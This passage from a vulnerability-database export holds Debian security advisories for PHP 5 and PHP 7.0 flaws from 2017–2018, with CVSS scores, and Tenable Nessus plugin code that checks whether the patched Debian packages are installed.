"CVE-2017-11145", "CVE-2017-11147"], "modified": "2017-07-21T11:45:57", "id": "DEBIAN:DLA-1034-1:C61BE", "href": "https://lists.debian.org/debian-lts-announce/2017/07/msg00026.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-07-20T21:48:41", "description": "Package : php5\nVersion : 5.4.45-0+deb7u9\nCVE ID : CVE-2016-10397 CVE-2017-11143 CVE-2017-11144\n CVE-2017-11145 CVE-2017-11147\n\nSeveral issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\nCVE-2016-10397\n Incorrect handling of various URI components in the URL parser could\n be used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143\n An invalid free in the WDDX deserialization of boolean parameters\n could be used by attackers able to inject XML for deserialization to\n crash the PHP interpreter.\n\nCVE-2017-11144\n The openssl extension PEM sealing code did not check the return value\n of the OpenSSL sealing function, which could lead to a crash of the\n PHP interpreter.\n\nCVE-2017-11145\n Lack of a bounds check in the date extension&#x27;s timelib_meridian\n parsing code could be used by attackers able to supply date strings to\n leak information from the interpreter.\n\nCVE-2017-11147\n The PHAR archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or potentially\n disclose information due to a buffer over-read in the\n phar_parse_pharfile function in ext/phar/phar.c.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2017-07-21T11:45:57", "type": "debian", "title": "[SECURITY] [DLA 1034-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147"], "modified": "2017-07-21T11:45:57", "id": "DEBIAN:DLA-1034-1:86C1B", "href": "https://lists.debian.org/debian-lts-announce/2017/07/msg00026.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-05-02T15:50:40", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4080-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 08, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php7.0\nCVE ID : CVE-2017-11144 CVE-2017-11145 CVE-2017-11628\n CVE-2017-12932 CVE-2017-12933 CVE-2017-12934\n\t\t CVE-2017-16642\n\nSeveral vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11144\n\n Denial of service in openssl extension due to incorrect return value\n check of OpenSSL sealing function\n\nCVE-2017-11145\n\n Out-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\n\n Buffer overflow in PHP INI parsing API\n\nCVE-2017-12932 / CVE-2017-12934\n\n Use-after-frees during unserialisation\n\nCVE-2017-12933\n\n Buffer overread in finish_nested_data()\n\nCVE-2017-16642\n\n Out-of-bounds read in timelib_meridian()\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 7.0.27-0+deb9u1.\n\nWe recommend that you upgrade your php7.0 packages.\n\nFor the detailed security status of php7.0 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/php7.0\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-08T22:30:09", "type": "debian", "title": "[SECURITY] [DSA 4080-1] php7.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12932", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-16642"], "modified": "2018-01-08T22:30:09", "id": "DEBIAN:DSA-4080-1:ADEE1", "href": "https://lists.debian.org/debian-security-announce/2018/msg00002.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-02T15:50:38", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4081-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 08, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2017-11142 CVE-2017-11143 CVE-2017-11144\n CVE-2017-11145 CVE-2017-11628 CVE-2017-12933\n\t\t CVE-2017-16642\n\nSeveral vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11142\n\n Denial of service via overly long form variables\n\nCVE-2017-11143\n\n Invalid free() in wddx_deserialize()\n\nCVE-2017-11144\n\n Denial of service in openssl extension due to incorrect return value\n check of OpenSSL sealing function.\n\nCVE-2017-11145\n\n Out-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\n\n Buffer overflow in PHP INI parsing API\n\nCVE-2017-12933\n\n Buffer overread in finish_nested_data()\n\nCVE-2017-16642\n\n Out-of-bounds read in timelib_meridian()\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 5.6.33+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFor the detailed security status of php5 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/php5\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-08T22:33:54", "type": "debian", "title": "[SECURITY] [DSA 4081-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11142", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642"], "modified": "2018-01-08T22:33:54", "id": "DEBIAN:DSA-4081-1:FFD0A", "href": "https://lists.debian.org/debian-security-announce/2018/msg00003.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:14:40", "description": "Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML.\n\nCVE-2016-10397 Incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143 An invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter.\n\nCVE-2017-11144 The openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter.\n\nCVE-2017-11145 Lack of a bounds check in the date extension's timelib_meridian parsing code could be used by attackers able to supply date strings to leak information from the interpreter.\n\nCVE-2017-11147 The PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "Debian DLA-1034-1 : php5 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libapache2-mod-php5", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter", "p-cpe:/a:debian:debian_linux:libphp5-embed", "p-cpe:/a:debian:debian_linux:php-pear", "p-cpe:/a:debian:debian_linux:php5", "p-cpe:/a:debian:debian_linux:php5-cgi", "p-cpe:/a:debian:debian_linux:php5-cli", "p-cpe:/a:debian:debian_linux:php5-common", "p-cpe:/a:debian:debian_linux:php5-curl", "p-cpe:/a:debian:debian_linux:php5-dbg", "p-cpe:/a:debian:debian_linux:php5-dev", "p-cpe:/a:debian:debian_linux:php5-enchant", "p-cpe:/a:debian:debian_linux:php5-fpm", "p-cpe:/a:debian:debian_linux:php5-gd", "p-cpe:/a:debian:debian_linux:php5-gmp", "p-cpe:/a:debian:debian_linux:php5-imap", "p-cpe:/a:debian:debian_linux:php5-interbase", "p-cpe:/a:debian:debian_linux:php5-intl", "p-cpe:/a:debian:debian_linux:php5-ldap", "p-cpe:/a:debian:debian_linux:php5-mcrypt", "p-cpe:/a:debian:debian_linux:php5-mysql", "p-cpe:/a:debian:debian_linux:php5-mysqlnd", "p-cpe:/a:debian:debian_linux:php5-odbc", "p-cpe:/a:debian:debian_linux:php5-pgsql", "p-cpe:/a:debian:debian_linux:php5-pspell", "p-cpe:/a:debian:debian_linux:php5-recode", "p-cpe:/a:debian:debian_linux:php5-snmp", "p-cpe:/a:debian:debian_linux:php5-sqlite", "p-cpe:/a:debian:debian_linux:php5-sybase", "p-cpe:/a:debian:debian_linux:php5-tidy", "p-cpe:/a:debian:debian_linux:php5-xmlrpc", "p-cpe:/a:debian:debian_linux:php5-xsl", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1034.NASL", "href": "https://www.tenable.com/plugins/nessus/101908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1034-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101908);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\");\n\n script_name(english:\"Debian DLA-1034-1 : php5 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and\ncan be embedded into HTML.\n\nCVE-2016-10397 Incorrect handling of various URI components in the URL\nparser could be used by attackers to bypass hostname-specific URL\nchecks.\n\nCVE-2017-11143 An invalid free in the WDDX deserialization of boolean\nparameters could be used by attackers able to inject XML for\ndeserialization to crash the PHP interpreter.\n\nCVE-2017-11144 The openssl extension PEM sealing code did not check\nthe return value of the OpenSSL sealing function, which could lead to\na crash of the PHP interpreter.\n\nCVE-2017-11145 Lack of a bounds check in the date extension's\ntimelib_meridian parsing code could be used by attackers able to\nsupply date strings to leak information from the interpreter.\n\nCVE-2017-11147 The PHAR archive handler could be used by attackers\nsupplying malicious archive files to crash the PHP interpreter or\npotentially disclose information due to a buffer over-read in the\nphar_parse_pharfile function in ext/phar/phar.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00026.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libphp5-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-interbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.45-0+deb7u9\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.45-0+deb7u9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:05", "description": "Several vulnerabilities were found in PHP, a widely-used open source general purpose scripting language :\n\n - CVE-2017-11142 Denial of service via overly long form variables\n\n - CVE-2017-11143 Invalid free() in wddx_deserialize()\n\n - CVE-2017-11144 Denial of service in openssl extension due to incorrect return value check of OpenSSL sealing function.\n\n - CVE-2017-11145 Out-of-bounds read in wddx_deserialize()\n\n - CVE-2017-11628 Buffer overflow in PHP INI parsing API\n\n - CVE-2017-12933 Buffer overread in finish_nested_data()\n\n - CVE-2017-16642 Out-of-bounds read in timelib_meridian()", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "nessus", "title": "Debian DSA-4081-1 : php5 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11142", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-4081.NASL", "href": "https://www.tenable.com/plugins/nessus/105664", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4081. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105664);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2017-11142\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\");\n script_xref(name:\"DSA\", value:\"4081\");\n\n script_name(english:\"Debian DSA-4081-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language :\n\n - CVE-2017-11142\n Denial of service via overly long form variables\n\n - CVE-2017-11143\n Invalid free() in wddx_deserialize()\n\n - CVE-2017-11144\n Denial of service in openssl extension due to incorrect\n return value check of OpenSSL sealing function.\n\n - CVE-2017-11145\n Out-of-bounds read in wddx_deserialize()\n\n - CVE-2017-11628\n Buffer overflow in PHP INI parsing API\n\n - CVE-2017-12933\n Buffer overread in finish_nested_data()\n\n - CVE-2017-16642\n Out-of-bounds read in timelib_meridian()\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-12933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-16642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4081\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the oldstable distribution (jessie), these problems have been\nfixed in version 5.6.33+dfsg-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libphp5-embed\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php-pear\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 